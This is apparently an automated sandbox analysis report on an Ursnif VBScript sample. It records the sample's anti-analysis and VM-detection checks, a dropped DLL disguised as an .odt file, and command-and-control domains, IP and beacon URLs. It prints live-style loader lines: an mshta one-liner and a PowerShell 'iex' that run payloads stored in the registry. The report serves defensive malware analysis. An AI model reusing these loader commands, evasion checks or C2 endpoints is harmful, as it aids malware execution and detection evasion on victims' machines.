Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXEZ
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2633 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6508 Jump to behavior
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 1288 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3708 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_7030E9E0 IsDebuggerPresent,DebuggerProbe, 28_2_7030E9E0
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E1D62 LoadLibraryA,GetProcAddress, 28_2_702E1D62
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702F0890 __NMSG_WRITE,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_702F0890
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702F8230 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_702F8230

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: beneficial.odt.2.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: gtr.antoinfer.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.228.233.17 80 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline' Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmp Binary or memory string: Progman
Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04444BDF cpuid 28_2_04444BDF
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 28_2_702E1813
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___crtGetLocaleInfoW,GetLastError,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,___crtGetLocaleInfoW,_isdigit, 28_2_70302100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,GetUserDefaultLangID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 28_2_702FFDD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 28_2_702FC7E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesA, 28_2_70300830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 28_2_702F00B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultCountry, 28_2_70300880
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __nh_malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,InterlockedDecrement,InterlockedDecrement, 28_2_702FD120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesA, 28_2_70300110
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,__stricmp,GetLocaleInfoA,__stricmp,_TestDefaultCountry,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage, 28_2_703001D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetACP,GetLocaleInfoA, 28_2_703009C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen, 28_2_70300AE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __nh_malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,InterlockedDecrement,InterlockedDecrement, 28_2_702FD4F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate, 28_2_7030CD00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate, 28_2_7030CD70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 28_2_7030CD50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 28_2_70308540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,_malloc,__MarkAllocaS,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,__freea, 28_2_7030CDC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesA, 28_2_70300610
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage, 28_2_70300690
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E1983 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 28_2_702E1983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04444BDF wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 28_2_04444BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E1262 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 28_2_702E1262
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: procexp.exe
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 458149 Sample: v8MaHZpVOY2L.vbs Startdate: 02/08/2021 Architecture: WINDOWS Score: 100 35 app.flashgameo.at 2->35 37 resolver1.opendns.com 2->37 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Multi AV Scanner detection for domain / URL 2->45 47 Found malware configuration 2->47 49 13 other signatures 2->49 8 wscript.exe 2 2->8         started        12 WmiPrvSE.exe 2->12         started        14 mshta.exe 19 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 33 C:\Users\user\AppData\...\beneficial.odt, PE32 8->33 dropped 55 Benign windows process drops PE files 8->55 57 VBScript performs obfuscated calls to suspicious functions 8->57 59 Deletes itself after installation 8->59 61 Creates processes via WMI 8->61 18 rundll32.exe 12->18         started        63 Suspicious powershell command line found 14->63 20 powershell.exe 24 14->20         started        signatures6 process7 file8 23 rundll32.exe 18->23         started        31 C:\Users\user\AppData\...\xbktblub.cmdline, UTF-8 20->31 dropped 27 csc.exe 1 20->27         started        29 conhost.exe 20->29         started        process9 dnsIp10 39 app.flashgameo.at 185.228.233.17, 49744, 49745, 49746 ITOS-ASRU Russian Federation 23->39 41 gtr.antoinfer.com 23->41 51 System process connects to network (likely due to code injection or exploit) 23->51 53 Writes registry values via WMI 23->53 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.228.233.17
 gtr.antoinfer.com Russian Federation
64439 ITOS-ASRU true

Contacted Domains

Name IP Active
gtr.antoinfer.com 185.228.233.17 true
resolver1.opendns.com 208.67.222.222 true
app.flashgameo.at 185.228.233.17 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://gtr.antoinfer.com/rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K true
  • Avira URL Cloud: malware
 unknown
http://app.flashgameo.at/G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G true
  • Avira URL Cloud: malware
 unknown